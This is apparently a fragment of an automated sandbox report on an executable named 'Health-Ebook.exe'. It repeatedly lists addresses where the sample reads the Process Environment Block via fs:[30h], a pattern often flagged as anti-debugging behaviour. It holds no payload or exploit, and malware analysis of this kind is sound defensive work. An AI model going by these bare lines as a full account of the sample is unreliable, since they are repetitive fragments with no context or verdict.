Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52F42B mov eax, dword ptr fs:[00000030h]2_2_1F52F42B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52F42B mov eax, dword ptr fs:[00000030h]2_2_1F52F42B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52F42B mov eax, dword ptr fs:[00000030h]2_2_1F52F42B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52F42B mov eax, dword ptr fs:[00000030h]2_2_1F52F42B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52F42B mov eax, dword ptr fs:[00000030h]2_2_1F52F42B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F504CD0 mov eax, dword ptr fs:[00000030h]2_2_1F504CD0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511CDD mov eax, dword ptr fs:[00000030h]2_2_1F511CDD
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511CDD mov eax, dword ptr fs:[00000030h]2_2_1F511CDD
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511CDD mov eax, dword ptr fs:[00000030h]2_2_1F511CDD
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D84CD mov eax, dword ptr fs:[00000030h]2_2_1F5D84CD
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50ACC0 mov eax, dword ptr fs:[00000030h]2_2_1F50ACC0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52E4C6 mov eax, dword ptr fs:[00000030h]2_2_1F52E4C6
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52E4C6 mov eax, dword ptr fs:[00000030h]2_2_1F52E4C6
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502CFB mov eax, dword ptr fs:[00000030h]2_2_1F502CFB
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C44EF mov eax, dword ptr fs:[00000030h]2_2_1F5C44EF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C0C9A mov eax, dword ptr fs:[00000030h]2_2_1F5C0C9A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3490 mov eax, dword ptr fs:[00000030h]2_2_1F5C3490
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F517488 mov eax, dword ptr fs:[00000030h]2_2_1F517488
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511C8E mov eax, dword ptr fs:[00000030h]2_2_1F511C8E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511C8E mov eax, dword ptr fs:[00000030h]2_2_1F511C8E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511C8E mov eax, dword ptr fs:[00000030h]2_2_1F511C8E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511C8E mov ecx, dword ptr fs:[00000030h]2_2_1F511C8E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511C8E mov eax, dword ptr fs:[00000030h]2_2_1F511C8E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F511C8E mov eax, dword ptr fs:[00000030h]2_2_1F511C8E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5014A0 mov eax, dword ptr fs:[00000030h]2_2_1F5014A0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F531356 mov eax, dword ptr fs:[00000030h]2_2_1F531356
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F531356 mov eax, dword ptr fs:[00000030h]2_2_1F531356
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F531356 mov eax, dword ptr fs:[00000030h]2_2_1F531356
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F531356 mov eax, dword ptr fs:[00000030h]2_2_1F531356
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F531356 mov eax, dword ptr fs:[00000030h]2_2_1F531356
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F531356 mov eax, dword ptr fs:[00000030h]2_2_1F531356
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F531356 mov eax, dword ptr fs:[00000030h]2_2_1F531356
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D8356 mov eax, dword ptr fs:[00000030h]2_2_1F5D8356
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1351 mov eax, dword ptr fs:[00000030h]2_2_1F5C1351
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52FB40 mov eax, dword ptr fs:[00000030h]2_2_1F52FB40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52FB40 mov eax, dword ptr fs:[00000030h]2_2_1F52FB40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52FB40 mov eax, dword ptr fs:[00000030h]2_2_1F52FB40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52FB40 mov eax, dword ptr fs:[00000030h]2_2_1F52FB40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52FB40 mov eax, dword ptr fs:[00000030h]2_2_1F52FB40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52FB40 mov eax, dword ptr fs:[00000030h]2_2_1F52FB40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51E370 mov eax, dword ptr fs:[00000030h]2_2_1F51E370
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51E370 mov eax, dword ptr fs:[00000030h]2_2_1F51E370
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51E370 mov eax, dword ptr fs:[00000030h]2_2_1F51E370
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54536C mov eax, dword ptr fs:[00000030h]2_2_1F54536C
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54536C mov eax, dword ptr fs:[00000030h]2_2_1F54536C
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CE362 mov eax, dword ptr fs:[00000030h]2_2_1F5CE362
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53AB0C mov eax, dword ptr fs:[00000030h]2_2_1F53AB0C
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53AB0C mov eax, dword ptr fs:[00000030h]2_2_1F53AB0C
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50C330 mov eax, dword ptr fs:[00000030h]2_2_1F50C330
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50C330 mov eax, dword ptr fs:[00000030h]2_2_1F50C330
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50C330 mov eax, dword ptr fs:[00000030h]2_2_1F50C330
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50E328 mov eax, dword ptr fs:[00000030h]2_2_1F50E328
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50E328 mov eax, dword ptr fs:[00000030h]2_2_1F50E328
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F593BD8 mov eax, dword ptr fs:[00000030h]2_2_1F593BD8
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C13D8 mov eax, dword ptr fs:[00000030h]2_2_1F5C13D8
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D83D7 mov eax, dword ptr fs:[00000030h]2_2_1F5D83D7
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov ecx, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov ecx, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov eax, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov ecx, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov ecx, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov eax, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov ecx, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov ecx, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov eax, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov ecx, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov ecx, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5363C2 mov eax, dword ptr fs:[00000030h]2_2_1F5363C2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F549BC7 mov eax, dword ptr fs:[00000030h]2_2_1F549BC7
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53ABFE mov eax, dword ptr fs:[00000030h]2_2_1F53ABFE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53ABFE mov eax, dword ptr fs:[00000030h]2_2_1F53ABFE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50F3E0 mov eax, dword ptr fs:[00000030h]2_2_1F50F3E0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50F3E0 mov eax, dword ptr fs:[00000030h]2_2_1F50F3E0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50F3E0 mov eax, dword ptr fs:[00000030h]2_2_1F50F3E0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534B96 mov eax, dword ptr fs:[00000030h]2_2_1F534B96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534B96 mov eax, dword ptr fs:[00000030h]2_2_1F534B96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534B96 mov eax, dword ptr fs:[00000030h]2_2_1F534B96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534B96 mov eax, dword ptr fs:[00000030h]2_2_1F534B96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534B96 mov eax, dword ptr fs:[00000030h]2_2_1F534B96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F546399 mov eax, dword ptr fs:[00000030h]2_2_1F546399
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F546399 mov eax, dword ptr fs:[00000030h]2_2_1F546399
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F546399 mov eax, dword ptr fs:[00000030h]2_2_1F546399
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C9B89 mov eax, dword ptr fs:[00000030h]2_2_1F5C9B89
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C9B89 mov ecx, dword ptr fs:[00000030h]2_2_1F5C9B89
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F504BB4 mov edi, dword ptr fs:[00000030h]2_2_1F504BB4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F584BBE mov eax, dword ptr fs:[00000030h]2_2_1F584BBE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F584BBE mov eax, dword ptr fs:[00000030h]2_2_1F584BBE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F584BBE mov eax, dword ptr fs:[00000030h]2_2_1F584BBE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F584BBE mov eax, dword ptr fs:[00000030h]2_2_1F584BBE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53BBBC mov eax, dword ptr fs:[00000030h]2_2_1F53BBBC
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C43A4 mov eax, dword ptr fs:[00000030h]2_2_1F5C43A4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C43A4 mov eax, dword ptr fs:[00000030h]2_2_1F5C43A4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C43A4 mov eax, dword ptr fs:[00000030h]2_2_1F5C43A4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C43A4 mov eax, dword ptr fs:[00000030h]2_2_1F5C43A4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5863A6 mov eax, dword ptr fs:[00000030h]2_2_1F5863A6
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534A5B mov eax, dword ptr fs:[00000030h]2_2_1F534A5B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534A5B mov eax, dword ptr fs:[00000030h]2_2_1F534A5B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F504A40 mov eax, dword ptr fs:[00000030h]2_2_1F504A40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F504A40 mov eax, dword ptr fs:[00000030h]2_2_1F504A40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1243 mov eax, dword ptr fs:[00000030h]2_2_1F5C1243
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F505275 mov eax, dword ptr fs:[00000030h]2_2_1F505275
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F505275 mov eax, dword ptr fs:[00000030h]2_2_1F505275
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F505275 mov eax, dword ptr fs:[00000030h]2_2_1F505275
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F505275 mov eax, dword ptr fs:[00000030h]2_2_1F505275
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F505275 mov eax, dword ptr fs:[00000030h]2_2_1F505275
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D0A74 mov eax, dword ptr fs:[00000030h]2_2_1F5D0A74
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1A71 mov eax, dword ptr fs:[00000030h]2_2_1F5C1A71
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53EA6E mov eax, dword ptr fs:[00000030h]2_2_1F53EA6E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53EA6E mov eax, dword ptr fs:[00000030h]2_2_1F53EA6E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53EA6E mov eax, dword ptr fs:[00000030h]2_2_1F53EA6E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F509210 mov eax, dword ptr fs:[00000030h]2_2_1F509210
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F509210 mov eax, dword ptr fs:[00000030h]2_2_1F509210
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F509210 mov eax, dword ptr fs:[00000030h]2_2_1F509210
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F509210 mov eax, dword ptr fs:[00000030h]2_2_1F509210
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F586A16 mov eax, dword ptr fs:[00000030h]2_2_1F586A16
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F586A16 mov eax, dword ptr fs:[00000030h]2_2_1F586A16
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F586A16 mov eax, dword ptr fs:[00000030h]2_2_1F586A16
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F503200 mov eax, dword ptr fs:[00000030h]2_2_1F503200
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5DEA09 mov eax, dword ptr fs:[00000030h]2_2_1F5DEA09
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5DEA09 mov eax, dword ptr fs:[00000030h]2_2_1F5DEA09
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D3A05 mov eax, dword ptr fs:[00000030h]2_2_1F5D3A05
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D3A05 mov eax, dword ptr fs:[00000030h]2_2_1F5D3A05
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F508209 mov eax, dword ptr fs:[00000030h]2_2_1F508209
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F508209 mov eax, dword ptr fs:[00000030h]2_2_1F508209
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F508209 mov eax, dword ptr fs:[00000030h]2_2_1F508209
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53523D mov eax, dword ptr fs:[00000030h]2_2_1F53523D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53523D mov eax, dword ptr fs:[00000030h]2_2_1F53523D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53523D mov eax, dword ptr fs:[00000030h]2_2_1F53523D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53523D mov eax, dword ptr fs:[00000030h]2_2_1F53523D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53523D mov eax, dword ptr fs:[00000030h]2_2_1F53523D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53523D mov eax, dword ptr fs:[00000030h]2_2_1F53523D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5322C3 mov eax, dword ptr fs:[00000030h]2_2_1F5322C3
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5322C3 mov eax, dword ptr fs:[00000030h]2_2_1F5322C3<